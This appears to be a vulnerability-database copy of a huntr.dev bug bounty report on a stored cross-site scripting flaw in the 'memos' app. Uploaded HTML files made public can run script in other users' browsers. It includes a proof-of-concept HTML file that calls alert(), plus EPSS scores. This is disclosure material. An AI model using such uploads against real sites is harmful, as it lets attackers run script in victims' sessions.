Lucene search

K
huntrLujiefsi5B3115C5-776C-43D3-A7BE-C8DC13AB81CE
HistoryNov 23, 2022 - 4:51 p.m.

Cross-site scripting

2022-11-2316:51:57
lujiefsi
www.huntr.dev
4
memos
file upload
vulnerability
cross-site scripting
attack
bugbounty

0.001 Low

EPSS

Percentile

20.3%

Description

memos allow users to upload file and make it public to others. But if the file is html with below content, xss attack can happen.

Proof of Concept

// PoC.js
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<script>
	alert("warning");
</script>
</head>
<body>


</body>
</html>

0.001 Low

EPSS

Percentile

20.3%

Related for 5B3115C5-776C-43D3-A7BE-C8DC13AB81CE